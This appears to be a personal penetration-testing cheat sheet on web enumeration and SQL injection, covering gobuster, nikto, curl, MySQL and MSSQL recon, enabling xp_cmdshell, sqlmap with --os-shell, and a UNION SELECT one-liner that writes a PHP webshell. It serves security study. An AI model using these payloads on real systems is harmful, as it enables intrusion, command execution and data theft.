💻Web

Enum

Directories and pages

gobuster dir -u $ip -w /usr/share/wordlists/dirb/common.txt -t 5 where -u is url or ip, -w is obviously wordlist, and -t is threads

APIs

gobuster dir -u $ip -w /usr/share/wordlists/dirb/big.txt -p $pattern where -p is a file of gobuster patterns. There's no built in pattern list, so you'll have to make one up as you go, informed by the api calls you see.

gobuster pattern example

{GOBUSTER}/v1
{GOBUSTER}/v2

nikto -h URL is a simple vuln scanner/enum scanner, it's a good place to start for relatively unprotected hosts

Burp Suite

TODO

cURL

curl -i $url -d $data -H $header --proxy $proxy curl to url -u with data -d going through --proxy, note you can have more than one -H

-X "$method" can be used to specify other http methods (GET is the default)

Well Known URLs

/robots.txt
/security.txt
/sitemap.xml

Directory Traversal

SQLi

Connection and Recon

Connect to mysql: mysql -u root -p'root' -h $ip -P $p where -u denotes user, -p password, etc.

Some useful commands

mysql

select version();
select system_user();
show databases;
-- following is a one liner to write a webshell out, must be to a location that's writable to db user
' UNION SELECT "<?php system($_GET['cmd']);?>", null, null, null, null INTO OUTFILE "/var/www/html/tmp/webshell.php" -- //

Connect to mssql from kali with impacket impacket-mssqlclient Administrator:passw0rd@$ip -windows-auth pretty straightforward, -windows-auth forces NTLM instead of kerberos

mssql

SELECT @@version;
SELECT name FROM sys.databases;
SELECT * FROM foobar.information_schema.tables; -- where foobar here is a database
select * from foobar.dbo.users; -- same here, foobar is a db
EXECUTE xp_cmdshell 'whoami'; --disabled by default

turn on xp_cmdshell

EXECUTE sp_configure 'show advanced options', 1;
RECONFIGURE;
EXECUTE sp_configure 'xp_cmdshell', 1;
RECONFIGURE;

Injection

Get number of columns with ' ORDER BY 1-- //

Timing based attack, the idea is that you short circuit if the proceeding thing is true, but I distinctly remember someone saying once that SQL doesn't always short circuit so watch out for that AND IF (1=1, sleep(3),'false') -- //

sqlmap

Use sqlmap -u $url/blindsqli.php?user=1 -p user where -p is the vulnerable parameter. --dump can be added to dump the whole DB, and --os-shell gives us a shell.

Note that sqlmap is super loud.

PreviousReconnaissance and Initial Access NextXSS

Last updated 3 months ago